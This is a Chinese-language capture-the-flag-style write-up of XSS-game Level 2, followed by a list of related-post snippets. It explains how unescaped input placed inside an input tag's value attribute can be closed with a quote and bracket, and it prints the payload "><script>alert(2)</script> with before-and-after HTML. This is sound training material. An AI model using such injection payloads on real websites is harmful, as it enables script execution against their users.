XSS-Game Level 2
第二关将结果拼接到了value属性中 , 我们插入JS脚本时手动闭合双引号即可
先看源码 , 获取了参数后 , 直接拼接到value属性中
虽然使用 htmlspecialchars() 转义了HTML标签 , 但并没有重新赋值给 $str , 所以不会此关卡造成影响
payload
"><script>alert(2)</script>
双引号用来闭合 value值左边的双引号 , >用来闭合 input 标签的右尖括号
<input name=keyword value="'.$str.'"> //拼接前
<input name=keyword value=""> <script>alert(2)</script> "> //拼接后
过关
XSS-Game Level 2相关推荐
- Xss挑战之旅writeup
Level_1 输入点在url中,反射型 payload: http://118.89.167.246:2503/xss-game/level1.php?name=<script>aler ...
- DVWA之XSS (完整版)
List item DVWA之XSS 文章目录 DVWA之XSS *Reflected XSS* Security Level: Low Security Level: Medium 1.双写绕过 2 ...
- Flash XSS 学习整理
0x00 Flash XSS 本来想放弃的,问了大佬,还是说可以研究下...所以硬着头皮来弄了. 什么是flash xss? xss一是指执行恶意js,那flash xss呢?是因为flash有可以调 ...
- springboot xss
1.xss 什么是XSS攻击? **XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击.**XSS的重点不在于跨站点,而在于脚本的执行.那么XSS的原理是: 恶意攻击者在w ...
- XSS-challenge
酒逢知己饮,诗向会人吟. 环境准备 PHP study XSS-game-master 源码 level1 ① 审计代码 对参数的输入输出没有做严格过滤. ② 解题思路 直接构造 js 脚本 ?nam ...
- XSS-labs通关游戏
Level 1 Palyload:name=<script>alert(/test/)</script> Level 2 Playload:keyword="> ...
- XSS-labs Level 19 Flash XSS
level 19 flash xss 查看前端代码,发现访问swf的时候在传参 接下来直接访问这个链接. 这里可以看到flash里面提示sifr.js是没有定义的,这不仅仅是个图片... 需要对fla ...
- xss Payload
来自某牛的网站:http://www.cnblogs.com/b1gstar/p/5783848.html Basic and advanced exploits for XSS proofs and ...
- xss测试工具(xsstrike基于python)
xsstrike很强 项目地址: https://github.com/s0md3v/XSStrike 安装: git clone https://github.com/s0md3v/XSStrike ...
- xss绕过尖括号和双括号_xss挑战平台练习
-------------------------XSS挑战之旅------------------------- 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss ...
最新文章
- 使用Python+OpenCV构建文档扫描程序
- Pandas数据规整
- Web后台服务开发——数据库查询之引入TypeORM
- redis安装及用Redis Desktop Manager连接Redis
- 2019-11-18 惯性环节对脉冲的响应曲线怎么画是正确的
- 《阿里云SRE技术期刊》2020年10月【电子版】
- mysql 数据库 安全_如何确保您MySQL数据库安全
- 热更新_热更新必懂3件事
- BZOJ4241历史研究题解
- am4xMjIx 解密,jn1221解密,AdminWeb 解密分析。
- ubuntu下锐捷客户端提示多个ip地址
- 射频芯片ATE测试从入门到放弃之基本概念
- servlet.ServletException: java.lang.NoClassDefFoundError: cn/huiyuan/lwj/vo
- MySQL 09 流程控制、自定义函数
- 服务器返回MOD文件失败,[17-02-06]【复杂问题】求助,forge服务器加了MOD后无法运行...
- python爬虫爬取网页信息
- Revit平面视图控制
- 单总线协议-以DS18B20举例
- CMake 安装教程
- 苹果手机字体大小怎么设置?简单实用,轻松学会